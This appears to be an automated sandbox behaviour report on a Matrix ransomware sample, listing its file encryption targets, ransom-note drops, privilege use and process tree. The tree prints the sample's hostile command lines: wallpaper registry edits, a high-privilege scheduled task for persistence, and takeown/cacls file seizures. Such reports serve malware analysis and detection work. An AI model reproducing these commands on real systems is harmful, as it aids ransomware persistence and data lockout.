a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\K: tLRJU41K64.exe File opened (read-only) \??\M: tLRJU41K64.exe File opened (read-only) \??\Q: tLRJU41K64.exe File opened (read-only) \??\Y: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\L: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\F: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\P: tLRJU41K64.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\PEB9lO3A.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\ui-strings.js a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\improved-office-to-pdf.png a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag_retina.png a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon_hover.png a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\ui-strings.js a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main-selector.css a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\ui-strings.js a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fil_get.svg a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleUpdateBroker.exe a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ko.properties a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.h a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\Google\Chrome\Application\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner_process.svg a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected-hover.svg a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\ui-strings.js a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ro-ro\ui-strings.js a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\id.pak a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\nn.pak a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\el.pak a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\ui-strings.js a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_move_18.svg a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\ui-strings.js a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\hi.pak a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\sRGB.pf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\ui-strings.js a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fr_135x40.svg a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\AppStore_icon.svg a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\icudt26l.dat a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\Mozilla Firefox\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javacpl.cpl a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_nb_135x40.svg a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2416 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4496 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4924 tLRJU41K64.exe 4924 tLRJU41K64.exe 4924 tLRJU41K64.exe 4924 tLRJU41K64.exe 4924 tLRJU41K64.exe 4924 tLRJU41K64.exe 4924 tLRJU41K64.exe 4924 tLRJU41K64.exe 4924 tLRJU41K64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4924 tLRJU41K64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 1828 takeown.exe Token: SeDebugPrivilege 4924 tLRJU41K64.exe Token: SeLoadDriverPrivilege 4924 tLRJU41K64.exe Token: SeTakeOwnershipPrivilege 1112 takeown.exe Token: SeTakeOwnershipPrivilege 4312 takeown.exe Token: SeTakeOwnershipPrivilege 1880 takeown.exe Token: SeTakeOwnershipPrivilege 2368 takeown.exe Token: SeTakeOwnershipPrivilege 4296 takeown.exe Token: SeTakeOwnershipPrivilege 1112 takeown.exe Token: SeBackupPrivilege 1828 vssvc.exe Token: SeRestorePrivilege 1828 vssvc.exe Token: SeAuditPrivilege 1828 vssvc.exe Token: SeTakeOwnershipPrivilege 4284 takeown.exe Token: SeTakeOwnershipPrivilege 992 takeown.exe Token: SeTakeOwnershipPrivilege 1916 takeown.exe Token: SeTakeOwnershipPrivilege 3340 takeown.exe Token: SeTakeOwnershipPrivilege 3676 takeown.exe Token: SeTakeOwnershipPrivilege 1472 takeown.exe Token: SeTakeOwnershipPrivilege 2164 takeown.exe Token: SeIncreaseQuotaPrivilege 4572 WMIC.exe Token: SeSecurityPrivilege 4572 WMIC.exe Token: SeTakeOwnershipPrivilege 4572 WMIC.exe Token: SeLoadDriverPrivilege 4572 WMIC.exe Token: SeSystemProfilePrivilege 4572 WMIC.exe Token: SeSystemtimePrivilege 4572 WMIC.exe Token: SeProfSingleProcessPrivilege 4572 WMIC.exe Token: SeIncBasePriorityPrivilege 4572 WMIC.exe Token: SeCreatePagefilePrivilege 4572 WMIC.exe Token: SeBackupPrivilege 4572 WMIC.exe Token: SeRestorePrivilege 4572 WMIC.exe Token: SeShutdownPrivilege 4572 WMIC.exe Token: SeDebugPrivilege 4572 WMIC.exe Token: SeSystemEnvironmentPrivilege 4572 WMIC.exe Token: SeRemoteShutdownPrivilege 4572 WMIC.exe Token: SeUndockPrivilege 4572 WMIC.exe Token: SeManageVolumePrivilege 4572 WMIC.exe Token: 33 4572 WMIC.exe Token: 34 4572 WMIC.exe Token: 35 4572 WMIC.exe Token: 36 4572 WMIC.exe Token: SeTakeOwnershipPrivilege 404 takeown.exe Token: SeIncreaseQuotaPrivilege 4572 WMIC.exe Token: SeSecurityPrivilege 4572 WMIC.exe Token: SeTakeOwnershipPrivilege 4572 WMIC.exe Token: SeLoadDriverPrivilege 4572 WMIC.exe Token: SeSystemProfilePrivilege 4572 WMIC.exe Token: SeSystemtimePrivilege 4572 WMIC.exe Token: SeProfSingleProcessPrivilege 4572 WMIC.exe Token: SeIncBasePriorityPrivilege 4572 WMIC.exe Token: SeCreatePagefilePrivilege 4572 WMIC.exe Token: SeBackupPrivilege 4572 WMIC.exe Token: SeRestorePrivilege 4572 WMIC.exe Token: SeShutdownPrivilege 4572 WMIC.exe Token: SeDebugPrivilege 4572 WMIC.exe Token: SeSystemEnvironmentPrivilege 4572 WMIC.exe Token: SeRemoteShutdownPrivilege 4572 WMIC.exe Token: SeUndockPrivilege 4572 WMIC.exe Token: SeManageVolumePrivilege 4572 WMIC.exe Token: 33 4572 WMIC.exe Token: 34 4572 WMIC.exe Token: 35 4572 WMIC.exe Token: 36 4572 WMIC.exe Token: SeTakeOwnershipPrivilege 3408 takeown.exe Token: SeTakeOwnershipPrivilege 3216 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3056 wrote to memory of 784 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 80 PID 3056 wrote to memory of 784 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 80 PID 3056 wrote to memory of 784 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 80 PID 3056 wrote to memory of 3464 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 82 PID 3056 wrote to memory of 3464 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 82 PID 3056 wrote to memory of 3464 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 82 PID 3056 wrote to memory of 208 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 89 PID 3056 wrote to memory of 208 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 89 PID 3056 wrote to memory of 208 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 89 PID 3056 wrote to memory of 3656 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 91 PID 3056 wrote to memory of 3656 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 91 PID 3056 wrote to memory of 3656 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 91 PID 3656 wrote to memory of 2020 3656 cmd.exe 93 PID 3656 wrote to memory of 2020 3656 cmd.exe 93 PID 3656 wrote to memory of 2020 3656 cmd.exe 93 PID 208 wrote to memory of 4328 208 cmd.exe 94 PID 208 wrote to memory of 4328 208 cmd.exe 94 PID 208 wrote to memory of 4328 208 cmd.exe 94 PID 208 wrote to memory of 3112 208 cmd.exe 95 PID 208 wrote to memory of 3112 208 cmd.exe 95 PID 208 wrote to memory of 3112 208 cmd.exe 95 PID 208 wrote to memory of 384 208 cmd.exe 96 PID 208 wrote to memory of 384 208 cmd.exe 96 PID 208 wrote to memory of 384 208 cmd.exe 96 PID 3056 wrote to memory of 4568 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 97 PID 3056 wrote to memory of 4568 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 97 PID 3056 wrote to memory of 4568 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 97 PID 4568 wrote to memory of 4656 4568 cmd.exe 99 PID 4568 wrote to memory of 4656 4568 cmd.exe 99 PID 4568 wrote to memory of 4656 4568 cmd.exe 99 PID 4568 wrote to memory of 1828 4568 cmd.exe 100 PID 4568 wrote to memory of 1828 4568 cmd.exe 100 PID 4568 wrote to memory of 1828 4568 cmd.exe 100 PID 4568 wrote to memory of 736 4568 cmd.exe 101 PID 4568 wrote to memory of 736 4568 cmd.exe 101 PID 4568 wrote to memory of 736 4568 cmd.exe 101 PID 736 wrote to memory of 3544 736 cmd.exe 102 PID 736 wrote to memory of 3544 736 cmd.exe 102 PID 736 wrote to memory of 3544 736 cmd.exe 102 PID 3544 wrote to memory of 4924 3544 tLRJU41K.exe 103 PID 3544 wrote to memory of 4924 3544 tLRJU41K.exe 103 PID 2020 wrote to memory of 1944 2020 wscript.exe 107 PID 2020 wrote to memory of 1944 2020 wscript.exe 107 PID 2020 wrote to memory of 1944 2020 wscript.exe 107 PID 1944 wrote to memory of 2416 1944 cmd.exe 109 PID 1944 wrote to memory of 2416 1944 cmd.exe 109 PID 1944 wrote to memory of 2416 1944 cmd.exe 109 PID 3056 wrote to memory of 2364 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 110 PID 3056 wrote to memory of 2364 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 110 PID 3056 wrote to memory of 2364 3056 a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe 110 PID 2364 wrote to memory of 2896 2364 cmd.exe 112 PID 2364 wrote to memory of 2896 2364 cmd.exe 112 PID 2364 wrote to memory of 2896 2364 cmd.exe 112 PID 2364 wrote to memory of 1256 2364 cmd.exe 113 PID 2364 wrote to memory of 1256 2364 cmd.exe 113 PID 2364 wrote to memory of 1256 2364 cmd.exe 113 PID 2364 wrote to memory of 504 2364 cmd.exe 114 PID 2364 wrote to memory of 504 2364 cmd.exe 114 PID 2364 wrote to memory of 504 2364 cmd.exe 114 PID 504 wrote to memory of 1656 504 cmd.exe 115 PID 504 wrote to memory of 1656 504 cmd.exe 115 PID 504 wrote to memory of 1656 504 cmd.exe 115 PID 2364 wrote to memory of 1672 2364 cmd.exe 116 PID 2364 wrote to memory of 1672 2364 cmd.exe 116
Processes
-
C:\Users\Admin\AppData\Local\Temp\a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe"C:\Users\Admin\AppData\Local\Temp\a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe" "C:\Users\Admin\AppData\Local\Temp\NWuBNe4P.exe"2⤵PID:784
-
-
C:\Users\Admin\AppData\Local\Temp\NWuBNe4P.exe"C:\Users\Admin\AppData\Local\Temp\NWuBNe4P.exe" -n2⤵
- Executes dropped EXE
PID:3464
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\PEB9lO3A.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\PEB9lO3A.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:4328
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:3112
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:384
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\GkAMOi06.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\GkAMOi06.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\O4dQlksE.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\O4dQlksE.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:2416
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:3080
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:992
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:4656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Users\Admin\AppData\Local\Temp\tLRJU41K64.exetLRJU41K.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""2⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C3⤵PID:2896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"3⤵
- Modifies file permissions
PID:1256
-
-
